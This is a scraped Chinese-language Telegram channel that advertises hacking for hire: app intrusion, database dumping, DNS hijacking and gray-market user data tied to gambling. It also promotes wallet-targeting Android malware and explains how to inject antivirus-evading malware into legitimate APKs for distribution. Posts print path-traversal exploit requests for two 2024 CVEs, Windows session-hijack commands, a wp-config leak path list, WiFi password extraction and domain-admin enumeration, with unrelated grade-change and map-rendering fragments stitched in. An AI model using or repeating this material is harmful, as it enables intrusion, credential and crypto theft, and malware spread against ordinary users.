黑客渗透 金融劫持 BC域名跳转
17.9K subscribers
1.78K photos
19 videos
2 files
161 links
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
破解网站app软件技术等等 黑客技术咨询
@hacker_HouZiM
Download Telegram
单击请求成绩更改。
注意:请求等级更改链接不
直到成绩名册之后才会出现
批准状态为已发布。
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
🔥3🎉3👍2🤩2
输入正确的成绩或使用查找
功能来选择正确的等级
To Grade 字段,然后按 Tab 键或
进入。
注:变更原因,日期学生
完成的工作,等级变化状态,
评论和参与程度(如果
适用)字段按下后出现
Tab 或 Enter。
您是否输入了不及格或 NR 等级
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
3🥰2👏2🤩2🔥1🎉1
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
🤩3👍2🥰21👏1🎉1
信息、警告、次要、重大或关键。关键攻击是试图使服务器扇或控制网络
关键·包含与试图逃避检测、导致网络设备扇或
得系统级权限对配漏洞
信息一包含与正常攻击对象匹配的攻击对象、包含URL的无害流量、DNS查找故障、SNMP公共社区字符串和点对点(P2P)参数。您可以使用信息性攻击对象来获取有关网络的信息
主要一包含与试图破坏服务、获取用户级别对网络设备的访问权限或激活先前加载在设备上加载的特洛伊木马的攻击漏洞匹配的攻击
次要一包含攻击对象与漏洞匹配,可以检测试图通过目录遍历或信息泄露访问重要信息的侦察工
作。
警告一包含与试图获取非危险信息或使用扫描工具扫描网络的攻击对象匹配的漏洞
信息攻击的危险性最小,通常被网络管
理员用来发现自安全系统中的漏洞
🔥4🤩31👍1👏1😁1🎉1
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
🤩4👍2👏21🔥1🥰1
金融股民渗透国内app,海外网站app,入侵后台,脱裤数据库, dns劫持 服务器进入等等
接渗透拿站,各大网站数据-拖库-提权联系
域名劫持 DNS 入侵网站破解网站app软件技术等等 联系:@hacker_HouZiM
🤩6👏21👍1🎉1
三网灰产DPI
已建好的模型可当日出数
抓取实时当日访问网站用户
可指定模型建模
可指定运营商
可指定/屏地区
可带库去重
六合·体彩·体育·综合·博彩·彩票棋牌-色粉
客服联系:@hacker_HouZiM
🥰52👏2👍1🎉1
小红书评论采集指定UID或者是作品链接筛选出你要的关键评论百分百精准实时采集实时出单
👍62👏2🔥1🥰1
Media is too big
VIEW IN TELEGRAM
新款手机控

3更新内容
1.币安、信任钱包更新

2.更全面的反卸载,封堵系统告警/安全查杀/恢复出厂等多种方式之卸载途径
黑客技术团咨询:@hacker_HouZiM
🔥3👏3🎉21👍1🤩1
This media is not supported in your browser
VIEW IN TELEGRAM
杀毒都是随便过
旧方式(假钱包或授权秒U)不再好玩。发财要吃第一波螃蟹。谁看到就是占先机。

如何开发市场散毒?

本软件生成的病毒有两种方式。

并均能免杀【不会报毒】

————方式1————

生成病毒+网页,打包成一个安装包

(例如淘宝网打包后,打开和真实淘宝APP无疑,能正常使用淘宝功能)

常见伪装:任何网页,色情,赌博,购物网等。


————方式2————

任何APP的安装安装包都可以注入病毒。

假设以 飞机 的安卓安装包为例,63M的大小。

注入病毒后,就只有65M左右。

常见伪装:任何安卓安装包

————利用以上条件方式,除了可以利用知名网址/app的公信力进行散播,也可以利用黄赌毒等具诱惑性手段进行散播。——
黑客技术团咨询:@hacker_HouZiM
👍3👏2🤩21🥰1🎉1
windows会话劫持

Jumbo师傅向我推荐了几个地址,发现还是能模拟(劫持?)用户会话然后创建进程,也就进而可以获取到其他会话挂载到3389的磁盘.


提升到system权限,再次执行

psexec -s \\localhost cmd

切换到会话1
tscon 1
黑客技术团咨询:@hacker_HouZiM
🎉32👍2🤩2🔥1🥰1
首先,地图上的坐标。有多种方式来描述这些坐标,常规十进制 WGS84,或更大更精确的坐标单位,对卫星视图很有用,还有其他方式来定义视口,例如,如果您希望给定像素大小的地图覆盖精确区域。基本上有您想要渲染地图的所有方式。还有各种地图图层、在地图上渲染标签的选项、位置标记、从一个方向到另一个方向绘制行程、覆盖服务器端绘制的所有地图功能等。

但更重要的是,它不仅渲染位图。它还渲染矢量图;Android 应用程序多年来一直使用矢量图,而 Web 最近才开始使用矢量图,并且只用于部分请求。矢量图有多种格式,所有这些都是专有的。

前者是常规二进制格式(签名“ DRAT ”),其二进制结构方便存储(地图渲染数据),并使用版本号来确定字段何时出现、更改含义或消失;数据由由图块坐标、固定密钥和随机数组成的简单 RC4 密钥(我找到了一篇简要描述它的研究论文(第 71 页),其中的解密密钥现已过时)和 ZLIB 进行混淆,并且仍在由 Android 应用程序使用。
🔥3🥰32🎉2👏1🤩1
拓展数据解析
一般这种ajax,返回的应该是正常的json格式,但是Chrome Webstore却不是,Chrome返回的的格式是这样的

我这里主要负责的工作就是前期的数据准备啦。主要目的:爬虫获取Chrome扩展的一些信息包括:扩展ID,扩展名,Star数量,用户数量、类别、插件商店URL等信息,然后根据ID下载扩展的.crx文件进行解压,提取其manifest.json,解析manifest.json中的web_accessible_resources字段,生成一个json文件。
黑客技术团咨询:@hacker_HouZiM
🥰3🤩32🔥1👏1
cve-2024-4956

GET /%2F%2F%2F%2F%2F%2F%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1

#poc #exploit
3🔥3🥰3👏1🎉1🤩1
抓包,页面有个302跳转,http header里面有flag
hctf{w3lcome_t0_hc7f_f4f4f4}
fuck ===
[code lang="php"]
if (isset($_GET['a']) and isset($_GET['b'])) {
if ($_GET['a'] != $_GET['b'])
if (md5($_GET['a']) === md5($_GET['b']))
die('Flag: '.$flag);
else
print 'Wrong.';
Wrong.
[/code]
利用php弱类型绕过的题,直接构造:
黑客技术团咨询:@hacker_HouZiM
🎉4🔥2🥰21🤩1
CVE-2024-20767

GET /pms?module=logging&file_name=../../../../../../../etc/passwd&number_of_lines=100 HTTP/1.1

#exploit #poc
‼️ERMAC V2.0 现已推出,视频即将推出,适用于应用程序的最强大的注入‼️
黑客技术团咨询:@hacker_HouZiM
🔥42🤩2🥰1🎉1
WP Exposed (wp-config Sensitive) File List

/wp-config.php-backup
/wp-config.php.orig
/wp-config.php.swp
/wp-config-sample.php
/wp-config.inc
/wp-config.old
/wp-config.txt
/wp-config.php.txt
/wp-config.php.bak
/wp-config.php.old
/wp-config.php.dist
/wp-config.php.inc
/wp-config.php.swp
/wp-config.php.html
/wp-config-backup.txt
/wp-config.php.save
/wp-config.php
👏6👍3🔥1🎉1🤩1
Ngrok是一个用于创建到本地服务器的临时隧道的工具。其主要目的是提供对本地服务器的外部访问,通常位于 NAT 路由器或防火墙后面。 Ngrok 广泛用于测试 Web 应用程序、演示原型以及提供从 Internet 访问本地服务器的功能。网络安全专业人员可以使用 Ngrok 进行漏洞评估、安全测试和网络流量分析
🤩3👍2🥰2🎉21👏1
netshwlan显示配置文件名称=MyWiFiNetworkKey=clear
key=clear参数使我们能够从计算机上存储的任何NiFi网络(配置文件)中提取WiFi密码。
提取组织中的域管理员用户列表
网络组域管理员域
默认情况下,“经过身份验证的用户组具有读取权限·组织中的任何经过身份验证的用户都可以执行此命令来识别哪些用户属于哪个组。在示例中我使用了域管理员组。此类信息对攻击者很有用为他们提供了“诱人的目标”·以哪些用户为目标(网络钓鱼、暴力破解等)以获取域管理员权
限。
获取域中所有用户的列表
网络用户/域
为您提供域中所有用户帐户的长列表。同样,这对攻击者来说可能很有用·为他们提供了另一块拼图.
黑客技术团咨询:@hacker_HouZiM
3👍2🔥2🥰2🎉1